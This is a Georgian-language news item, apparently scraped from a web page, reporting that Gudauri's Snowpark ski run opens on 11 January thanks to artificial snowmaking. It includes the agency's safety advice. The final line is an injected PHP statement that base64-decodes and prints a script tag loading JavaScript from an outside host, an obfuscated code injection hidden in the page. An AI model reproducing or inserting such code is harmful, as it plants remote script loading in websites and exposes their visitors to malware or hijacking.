celsiusi
ავერსი შნაიდერი
მთის ტრასების სააგენტოს ინფორმაციით, გუდაურში 11 იანვრიდან სნოუპარკის სასრიალო ტრასა გაიხსნება.
სააგენტოს ცნობით, თოვლის დაგროვების მიზნით, გუდაურში სრული დატვირთვით მუშაობდა ხელოვნური გათოვლიანების სისტემა, რამაც მოგვცა საშუალება, შეგვეგროვებინა დახლოებით 100 000 კუბი ხელოვნური თოვლი.
„აქამდე, ბუნებრივი თოვლის არარსებობის გამო, შეუძლებელი იყო მხოლოდ ხელოვნურ თოვლზე ტრასების მომზადება. თუმცა, ამ წუთის მონაცემებით, ბოლო დღეებში მოსული მცირე ნალექი, დაგროვებულ ხელოვნურ თოვლთან ერთად, საშუალებას გვაძლევს, რომ 11 იანვარს გავხსნათ „სნოუპარკის“ სათხილამურო ტრასა. ჩვენი გუნდი 24 საათიან რეჟიმში ყველა რესურსს იყენებს იმისთვის, რომ კურორტმა სრულყოფილად იფუნქციონიროს. ხელოვნური გათოვლიანების სისტემა მომავალ დღეებშიც იმუშავებს, იმისთვის, რომ დამატებით კიდევ ერთი სათხილამურო ტრასის გახსნა შევძლოთ. გთხოვთ, გაითვალისწინეთ, რომ თოვლის საფარი მხოლოდ მარკირებულ ტრასაზეა და ნუ ისრიალებთ ჩვენ მიერ შემოსაზღვრული არეალის მიღმა, თქვენივე უსაფრთხოებისთვის. ყურადღება მიაქციეთ გამაფრთხილებელ ნიშნებს. უმორჩილესად გთხოვთ, გაგებით მოვეკიდოთ არსებულ რეალობას და ხელი შევუწყოთ ერთმანეთს“, – აცხადებენ სააგენტოში.
515
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");